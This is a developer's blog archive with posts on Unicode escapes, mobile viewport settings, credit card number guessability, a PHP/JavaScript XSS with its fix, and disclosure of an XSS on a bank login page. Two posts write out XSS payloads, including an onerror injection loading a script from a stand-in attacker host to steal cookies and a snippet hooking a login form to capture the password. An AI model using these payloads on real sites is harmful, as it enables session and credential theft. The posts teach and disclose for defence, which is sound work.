[philiptellis] /bb|[^b]{2}/
Never stop Grokking

Saturday, January 29, 2011

Printing unicode characters in web documents

I often have to look up reference sites to find out how to write a particular character in HTML, JavaScript or CSS when that character isn't on my keyboard. This post should save me some searching time in future.

To type a character that's not on your keyboard, you need its unicode codepoint in decimal or hexadecimal. In the examples below, HH means two hexadecimal digits, DD means two decimal digits, HHHH is four hexadecimal digits, and so on. DD+ means two or more decimal digits, HH+ means two or more hexadecimal digits.


To type out unicode characters in HTML, use one of the following:
  • &#DDD+;
  • &#xHHH+;
Ɖ == Ɖ
Ɖ == Ɖ
‡ == ‡


To type out unicode characters in JavaScript, use the following:
  • \uHHHH
 == \u2021


To print out a unicode character using CSS content, use the following:
  • \HH+
 == \2021
(Note: the CSS example that I've used here only works in browsers that support the :before pseudo class and the content rule, but in general you can use unicode characters anywhere in CSS.)


URL context is different from HTML context, so I'm including it here.

To print a unicode character into a URL, you need to represent it in UTF-8, using the %HH notation for each byte.
‡ ==  %E2%80%A1
л ==  %D0%BB
' ==  %39
This is not something that you want to do by hand, so use a library to do the conversion. In JavaScript, you can use the encodeURI or encodeURIComponent functions to do this for you.

End notes

Use escape sequences only in two cases.
  1. Your editor or keyboard doesn't allow you to type the characters in directly.
  2. The characters could be misinterpreted as syntax, eg < or > in HTML.

References and Further Reading

  1. List of Unicode Characters on WikiPedia
  2. UTF-8 on WikiPedia
  3. Unicode and HTML on WikiPedia
  4. JavaScript Unicode Escape Sequences on Mozilla Developer Network
  5. Richard Ishida. 2005. Using Character Escapes in Markup and CSS in W3C Internationalisation.

Tuesday, January 25, 2011

device-width and how not to hate your users

I've been catching up on my technical reading, and this weekend was spent on Responsive Enhancement1. I'd read about it before on Jeremy Keith's blog and his comments on proportion perfection over pixel perfection2 made me think. Finally, Kayla's report3 on Smashing Magazine about responsive web design coming up as I was thinking about making bluesmoon.info more mobile friendly is what prompted me to study it in detail.

I'm not going to go into the details of responsive enhancement, the references at the end of this article serve that purpose. This article lists what I think are best practices and my reasons for them.

@media queries

As a web designer or developer, you want your page to be easily viewable across different devices and screen sizes. It shouldn't matter whether your user uses a 21" desktop monitor, a 13" laptop, a 10" iPad or a much smaller smartphone. Responsive web design uses @media queries to change the layout of the page using CSS based on browser width. You might have CSS that looks like this:
/* Default wide-screen styles */

@media all and (max-width: 1024px) {
    /* styles for narrow desktop browsers and iPad landscape */

@media all and (max-width: 768px) {
    /* styles for narrower desktop browsers and iPad portrait */

@media all and (max-width: 480px) {
    /* styles for iPhone/Android landscape (and really narrow browser windows) */

@media all and (max-width: 320px) {
    /* styles for iPhone/Android portrait */

@media all and (max-width: 240px) {
    /* styles for smaller devices */
And yes, you could go smaller than that, or have intermediate sizes, but I'll cover that later.


Now this works reasonably well when you resize desktop browsers4, but not so much for mobile browsers. The problem is that mobile browsers (iPhone/Safari, Android/Chrome and Fennec) assume that the page were designed for a wide screen, and shrink it to fit into the smaller screen. This means that even though users could have had a good customised experience for their smaller devices, they won't because the device doesn't know about this5. The trick is to use Apple's viewport6, 7, 8 meta tag in your document's head in conjunction with @media queries9:
<meta name="viewport" content="...">
I've left the content attribute empty for now because this is where I see confusion... which is what we'll talk about now.
Most sites that I've seen advise you to set the content attribute to width=device-width. This tells the browser to assume that the page is as wide as the device. Unfortunately, this is only true when your device is in the portrait orientation. When you rotate to landscape, the device-width remains the same (eg: 320px), which means that even if your page were designed to work well in a 480px landscape design, it would still be rendered as if it were 320px.

It's tempting to use the orientation media query to solve this problem, but orientation doesn't really tell you the actual width of the device. All it tells you is whether the width is larger than or smaller than the device's height. As ppk points out5, since most pages tend to scroll vertically, this is irrelevant.

Use this if you use the same page styles in portrait and landscape orientation. Also note that using width=device-width is the only way to tell android devices to use the device's width12.
Setting initial-scale=1 tells the browser not to zoom in or out regardless of what it thinks the page width is. This is good when you've designed your page to fit different widths since the browser will use the appropriate CSS rules for its own width, and initial-scale stops the zooming problem that we faced without the viewport meta tag.

Unfortunately a bug, or more likely a mis-feature, in mobile safari messes this up when a device is rotated from portrait to landscape mode. initial-scale is honoured only on full page load. On rotate from portrait to landscape mode, the browser assumes that the page width stays the same and scales accordingly (1.5) to make 320 pixels fit into 480pixels. However, as far as @media queries go, it reports a 480px width, and uses the appropriate CSS rules to render the page. This results in a page designed for 480px rendered scaled up 1.5 times. It's not horrible, but it's not desirable. Fennec claims8 that it does the right thing in this case. The Android emulator is impossible to work with and I haven't tested on mobile Opera yet.

To get around this bug, the pixel perfection camp suggests also setting maximum-scale=1. This stops the page zoom in on rotate, but it has the undesired side effect of preventing the user from zooming the page. This is a problem from the accessibility point of view. Zooming in is a very valid use case for users with bad eyesight, and in some cases, even users with good eyesight who just want a closer look at some part of your page. Do this only if you hate your users. It goes without saying that setting user-scalable=no should also not be used on most general purpose pages.

A better solution may be design your page to use the same styles in portrait and landscape orientation and set width=device-width. This way even if it does zoom, it will still be proportionate. See Lanyrd10 for an example of this design.
width=<actual width>
Some sites advise using a specific viewport width and designing your pages for that width. This is fine if you're building a separate page for each device class, but that doesn't flow with the concept of responsive design. Fixed width layouts are for print. The web is fluid and adapts to its users. Your site should too. Don't use this.
@media all and (device-width:480)
While this is a media query rather than an option to the viewport meta tag, I've seen it at various locations, and don't think it's the best option around. Here's why. According to the CSS3 media queries spec11, the device-width media feature describes the width of the rendering surface of the output device. For continuous media, this is the width of the screen. For paged media, this is the width of the page sheet size.

We're dealing with continuous media here (on-screen as opposed to printed), in which case the spec states that this is the width of the screen. Unless the browser window is maximised, this might be larger than the viewport with. My tests show that most desktop browsers treat device-width and width as synonyms. Mobile browsers seem a little confused on the matter. As far as the viewport meta tag goes, device-width is the width of the device in portrait orientation only. For a 320x480 device, device-width is always 320px regardless of orientation. For CSS media queries, however, device-width is the width of the screen based on its current orientation.

If you are going to use this, use it in conjunction with the orientation media feature. Never use max-device-width and min-device-width. It's better to use max-width and min-width instead. Also remember that device widths may change with newer models. You want your design to be future proof.

Intermediate widths

I'd mentioned above that you could design for any number of widths. The important thing is to test your page for different browser widths. This is fairly easy to do just by resizing your browser window. Test, and whenever you find your page layout break, either fix the layout for all widths, or build a new layout for smaller widths.

On bluesmoon.info, I change many parts of the page depending on page width. The default design (at the time of this article) has 5% empty space around the content. This is fine really wide screens (1152px or more), but as you get smaller, the empty space becomes a waste. Below 1152px, I shrink this to 2% and below 1024px, I get rid of it completely. You could say that my page content was really built for 1024px. This design also works for the iPad in landscape mode.

Below 1000px, all 3 column pages switch to a 2 column layout. Below 580px, I move the right column on all pages below the main content. All pages that initially had 3 columns now have 2 columns below the main content.

As we get smaller, I reduce the space used by non-essential content like the footer, the sidebars and the menu at the top, leaving as much space as possible for main content. Finally, when we get below 380px, the whole page turns into a single column layout.

This is of course, just an example. Your own site may have a layout that works perfectly at all screen widths, or you may need to design only two or three layouts. It's easy to test and design, so there's no reason not to. Designing for multiple widths took me just a couple of hours, and a lot of it was spent reading the articles below.


So finally, this is what I recommend.
  1. DO use the viewport meta tag
  2. DO use media queries to render your page appropriately for various widths ranging from under 200px to 1024px or more
  3. DO use width=device-width,initial-scale=1 in your viewport meta tag OR use width=device-width alone12.
  4. DO NOT use maximum-scale=1 or user-scalable=no
  5. DO NOT use width=<specific width>
  6. DO NOT use @media all and (*-device-width: xxx)

Remember that using initial-scale=1.0 throws you open to a zooming bug in mobile Safari. Push Safari to fix this bug. Finally, David Calhoun has a great summary13 of all options to the viewport meta tag, and alternate meta tags for older phones. Well worth a read. Also note that Mozilla's documentation8 of the viewport meta tag is far better than Safari's7.

Footnotes & References

  1. Ethan Marcotte. 2010. Responsive Web Design. In A List Apart #306. ISSN: 1534-0295.
  2. Jeremy Keith. 2010. Responsive Enhancement. In adactio.
  3. Kayla Knight. 2011. Responsive Web Design: What It Is and How To Use It. In Smashing Magazine.
  4. Webkit based desktop browsers re-render the page correctly as you resize the browser, however they have a minimum width of 385px (on MacOSX) and I was unable to shrink the browser below this. Firefox 4 re-renders the page correctly until the width gets too narrow to fit the navigation toolbar. At that point the viewport width stays fixed even if you shrink the browser. The page is re-rendered if you type something (anything) into the URL bar. Opera 10/11 re-render correctly at all sizes.
  5. Peter Paul Koch. 2010. A tale of two viewports — part two. In Quirksmode.
  6. Using the Viewport on Safari. In Safari Web Content Guide.
  7. The viewport meta tag. In Safari HTML Reference.
  8. MDC. 2010. Using the viewport meta tag to control layout on mobile browsers. In Mozilla Developer Network.
  9. Peter Paul Koch. 2010. Combining meta viewport and media queries. In Quirksmode.
  10. Willison & Downe. Lanyrd.
  11. Lie et al. 2010. Media Queries. W3C Candidate Recommendation 27 July 2010.
  12. If you design your page for the narrow view and expect it to scale when rotated, then use width=device-width and nothing else. If, instead, you design your page for either width, then use width=device-width,initial-scale=1. This is the only way to get the android browser to render a page with the intended width. Mobile Safari will render the page exactly as if initial-scale=1 were specified alone. You will still end up with the zoom on rotate bug.
  13. David Calhoun. 2010. The viewport metatag (Mobile web part I).

Friday, January 21, 2011

How guessable is your credit card number?

I just saw an article over at Mint that explains what each digit in a credit card is used for. It's a short read, but very well presented. Go read it now, then come back here.

So I got to thinking. The first 6 digits of my card are based on the type of card I have, and the entire lookup is available online. The last 4 digits are generally printed on credit card receipts. Now for most credit cards that have an 8 or 9 digit account number, this leaves 5 or 6 unknown digits. In the worst case that's a million possibilities. This isn't the worst case though, because we know the checksum, which is the last digit, and shows up on credit card receipts. Using the Luhn algorithm, we can reduce the search space by 90%. This leaves 100,000 possibilities for the unknown 6 digit number. If you have an 8 digit account number, then the space reduces to 10,000 possibilities.

It takes a computer very little time to generate that many numbers.

Thursday, January 20, 2011

Sometimes you need to wash twice

When conversing across languages, informations is sometimes lost in translation.

The problem I'll talk about today deals with the different ways in which quotes can be represented in different contexts, in particular, when passing data across language boundaries. Let's look at some code.
   $s = filter_var($_GET['s'], FILTER_SANITIZE_SPECIAL_CHARS);
   var s = "<?php echo $s; ?>";

   var div = document.getElementById("content");
   div.innerHTML = s;
From the HTML perpective, this code appears clean. Data from the URL parameter s needs to be written out to HTML and we're applying a suitable filter to it to make it safe for use in that context. This code would be fine if we were passing the data directly from PHP to HTML, but that's not what we're doing here.

Testing this code out with the usual suspects — <>&"' — shows that it's safe. You can neither insert HTML into the div, nor can you insert JavaScript by getting out of the quotes since all quotes in the input data are converted to &#34;

It seems that the worst that we can do here is to break the JavaScript by throwing a \ into the end of s. The output of our PHP becomes:
   var s = "...\";

   var div = document.getElementById("content");
   div.innerHTML = s;
The result is that our JavaScript terminates with an error after line 1, and that's the end of it... but maybe not.

The \ gives us a clue. In JavaScript, all characters are unicode, and we can represent any character by its unicode equivalent using the \u<codepoint>. This still doesn't help us get out of the quotes in JavaScript, but it does mess around with the innerHTML.

What we're doing in the innerHTML assignment is assigning a string to a div's innerHTML property, and then the browser goes ahead and renders that string as if it were HTML. In essence, innerHTML is to HTML what eval() is to JavaScript and PHP — a bad idea.

We can now craft a string made completely using the unicode escape sequences for JavaScript. For example, \u003cscript+src\u003d\u0022http://evil.com/cookie-steal.js\u0022\u003e\u003c/script\u003e

When assigned to the innerHTML, it turns into the following HTML:
<script src="http://evil.com/cookie-steal.js"></script>
Fortunately, browsers won't execute script nodes that were added using innerHTML. They will, however execute inline events on elements added through innerHTML, so we do this instead:
\u003cimg+src\u003dblah+onerror\u003d\u0022s=document.createElement(\u0027script\u0027);s.src\u003d\u0027http://evil.com/cookie-steal.js\u0027;document.body.appendChild(s);\u0022\u003e, which translates to the following HTML (indented for readability):
<img src=blah
The JavaScript fires in most cases. To get it to fire in all cases, you also need to attach to the onload event.

So, what's the fix here?

To think about the fix, we need to think about context, and every place this user data is being used. Depending on the actual use case, our fix may involve just one change, or several changes to the above code. One change is mandatory though:
   $s = filter_var($_GET['s'], FILTER_SANITIZE_SPECIAL_CHARS);
   var s = <?php echo json_encode($s); ?>

   var div = document.getElementById("content");
   div.innerHTML = s;
The json_encode function returns a quoted JavaScript string. It correctly escapes all characters within that string that are special to JavaScript, so in our case, \u00xx turns into \\u00xx. Note that addslashes is insufficient as it does not escape newline characters which are valid inside PHP strings.

Two things to learn from this:
  1. When passing untrusted data across language boundaries, you may need to sanitize it multiple times
  2. innerHTML is the eval of HTML

Saturday, January 01, 2011

Fixing the XSS on ICICIDirect.com

I tried logging in to my ICICIDirect account over Christmas and realised that I'd forgotten my username (I still remembered the password though). While entering the wrong username, I also noticed that I was being redirected to the following URL:
Notice the error message showing up in the URL. Curiosity got the better of me and I tried playing around with the URL and found that it was open to an XSS. I sent the following message to their helpdesk:

I've found a security hole on your login page. Please put me in touch with someone responsible for the security of your page so I can explain the problem to them and get it fixed.

and then tweeted about the existence of the XSS without providing any details. Pretty soon others figured it out as well.

Now this was on Sunday the 26th, and no one at ICICI was checking emails, but on Monday I received a phone call from Abhishake Mathur, the head of customer service. He called on the phone number registered with my account. I tried to explain the concept of a cross-site-scripting bug to him and that an evil person could use it to steal a user's password, but it wasn't easy. He kept telling me that when I visit their site I should see the lock icon (referring to the SSL lock that some browsers display for sites served over HTTPS) and that as long as I saw that, no one could steal my password. I asked him to email me from his official address so that I could reply and demonstrate the problem along with screenshots and links.

I received no emails, however he called back a few times with questions from his technical team and someone who he called his senior, however these people were either not allowed to speak to me directly or did not want to speak to me directly. I can imagine that some companies only like PR or Customer Support to interact directly with users. We at Yahoo! have an official security contact and all security related communication is done through that channel, however the persons behind that channel are all highly technical and qualified in the security field.

In any event, I headed out early that evening, and was not home when they called a few more times. I left word at home that if they call to ask them to email me. That night I still hadn't received an email. The following morning they called while I was in the shower and my dad asked them to call back a little later. When I got out, there was an email in my inbox essentially asking me to describe the problem I was facing.

I replied with the following:
Hi Abhishake,

Thank you for getting back to me. I'll explain the problem in detail. First let's define three entities.

1. The real user, we shall call this person Ashish
2. Your website, we shall refer to this as ICICIDirect
3. The attacker, we shall call this person Bala

Now, in this scenario, Bala sends an email to Ashish pretending to come from ICICIDirect. Note, this is similar, but different normal phishing email since in this email, he includes a real URL to ICICIDirect. It would look something like this:

Dear User,

Please log in to ICICIDirect here.

Thank you,


Of course, it might have more details to make it look authentic. Now if you check the link, you will see that it points to this URL:

This is a link on the ICICIDirect website as you can see, it starts with https://secure.icicidirect.com/ and is running on your own servers. Now if you click on the link, it will show you a page that looks like this:
ICICIDirect - login

This page is exactly the same as your login page because it is your login page. However, if you try to login (for this example, please log in with a fake password since it will be displayed), then you will get something like this:


For this example, I have only displayed the password in a JavaScript popup, but a real attacker like Bala in our example would send this username and password to their own server using a beacon.

The reason this thing happens is because the "errmsg" parameter that is passed in the URL of the page is not sanitized to make sure it is safe. By default you pass in error messages like "Invalid User Name or Password", but an attacker can change this message to anything exactly like I have done in this example. They can add JavaScript to this parameter and get it inserted into your page.

If you do a view source on the link that I sent you, you will see the following code in there:
setTimeout(function() {var e=document.getElementsByName('FML_USR_USR_PSSWRD')[0];
 e.form.onsubmit=function() {alert('password is ' + e.value);
 return false;};},2000);

This was added by manipulating the "errmsg" parameter.

Although there are better ways to accomplish what you need to do, the immediate way to fix this is to validate the errmsg parameter to make sure it only contains safe values. This means that there should be no <, > &, " or ' characters in this parameter. In ASP you can do this using the Server.HtmlEncode method to clean the errstr parameter. For a more detailed analysis of cross site scripting in ASP, have a look at this document: http://www.4guysfromrolla.com/webtech/112702-1.2.shtml

I hope this explains the problem completely. The example I have shown is fairly benign, but a real bad person could do worse things. Feel free to get back to me if you have more questions. As a user of ICICIDirect, I am very interested in making sure it is secure.

Thank you,
I received a reply in under an hour saying that their technical team was looking into the matter and then three hours later another email saying that the issue was fixed and asking if I could verify.

I checked, and they had indeed fixed the immediate problem. They still weren't sanitizing the input, however they went one step further, they completely ignored the input. The initial problem was that they were echoing the value of the errmsg parameter untreated. Their solution was to treat the errmsg parameter as a boolean and echo a fixed error message of Invalid Login Id or Password:Please try again. if the parameter was set to any value.

This fixes the immediate issue, but given that they haven't considered input filtering, chances are that there are similar bugs elsewhere on the site that still exist.